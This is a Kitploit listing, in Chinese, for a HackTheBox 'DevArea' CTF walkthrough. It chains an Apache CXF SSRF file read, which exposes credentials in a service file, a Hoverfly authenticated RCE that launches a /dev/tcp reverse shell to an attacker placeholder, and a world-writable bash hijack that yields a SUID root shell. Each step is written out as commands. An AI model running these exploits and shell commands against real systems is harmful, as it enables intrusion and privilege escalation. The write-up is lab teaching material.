Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
devarea — HackTheBox DevArea 演练:串联 CVE-2022-46364 Apache CXF SSRF、CVE-2025-54123 Hoverfly RCE 以及 SUID bash 劫持以实现 root 提权。 | Kitploit
工具/GitHubGitHub/ledksv/devarea
权限提升漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育红队实验室与实践
GitHubledksv/devarea

devarea

HackTheBox DevArea 演练:串联 CVE-2022-46364 Apache CXF SSRF、CVE-2025-54123 Hoverfly RCE 以及 SUID bash 劫持以实现 root 提权。

2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

DevArea — HackTheBox

平台: HackTheBox 操作系统: Linux 状态:已退役 — 完整演练已发布。

完整演练: l3dsec.com/walkthroughs/devarea-htb


攻击链

root@kitploit:~
nmap → 21 (FTP anon) + 80 + 8080 (Jetty) + 8888 (Hoverfly)
  → FTP anon → employee-service.jar (Apache CXF, pre-3.5.5)
    → CVE-2022-46364 SSRF → file:///etc/systemd/system/hoverfly.service
      → admin credentials in ExecStart
        → CVE-2025-54123 Hoverfly RCE → shell as dev_ryan → user flag
          → /usr/bin/bash world-writable + sudo syswatch.sh calls it
            → bash hijack → SUID rootbash → root flag

1. 枚举

root@kitploit:~
nmap -sC -sV -p- <TARGET_IP>
# 21/tcp  open  ftp     vsftpd 3.0.5 (anonymous login)
# 8080/tcp open http    Jetty 9.4.27
# 8888/tcp open http    Hoverfly Dashboard

从 pub/ 匿名下载 FTP 得到 employee-service.jar — Apache CXF SOAP 服务,捆绑版本低于 3.5.5。


2. CVE-2022-46364(Apache CXF SSRF → 凭据读取)

3.5.5 之前的 CXF 会在服务端反射 XOP:Include href URL — 通过 file:// 实现任意文件读取。

root@kitploit:~
python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/systemd/system/hoverfly.service -d devarea.htb
# ExecStart: hoverfly -add -username admin -password O7IJ27MyyXiU
# User=dev_ryan

3. CVE-2025-54123(Hoverfly 认证后 RCE)

Hoverfly 1.11.3 — 通过中间件配置注入实现认证后 RCE。

root@kitploit:~
nc -lvnp 4444
./CVE-2025-54123.sh -t http://<TARGET_IP>:8888 -u admin -p O7IJ27MyyXiU -c "bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"

获得 dev_ryan 的 shell。用户 flag 位于 /home/dev_ryan/user.txt。


4. 权限提升 — Bash 二进制劫持

root@kitploit:~
sudo -l
# (root) NOPASSWD: /opt/syswatch/syswatch.sh
ls -la /usr/bin/bash
# -rwxrwxrwx  (world-writable)

syswatch.sh 内部调用 /usr/bin/bash。替换为丢弃 SUID 的脚本:

root@kitploit:~
cp /usr/bin/bash /tmp/bash.bak
printf '#!/tmp/bash.bak\ncp /tmp/bash.bak /tmp/rootbash\nchmod 4755 /tmp/rootbash\n' > /usr/bin/bash
chmod +x /usr/bin/bash
sudo /opt/syswatch/syswatch.sh status
/tmp/rootbash -p
# euid=0(root)

Root flag 位于 /root/root.txt。


Flags

FlagValue
Userredacted
Rootredacted

仅供教育目的使用。仅测试您拥有或已获得明确书面许可的系统。

下载工具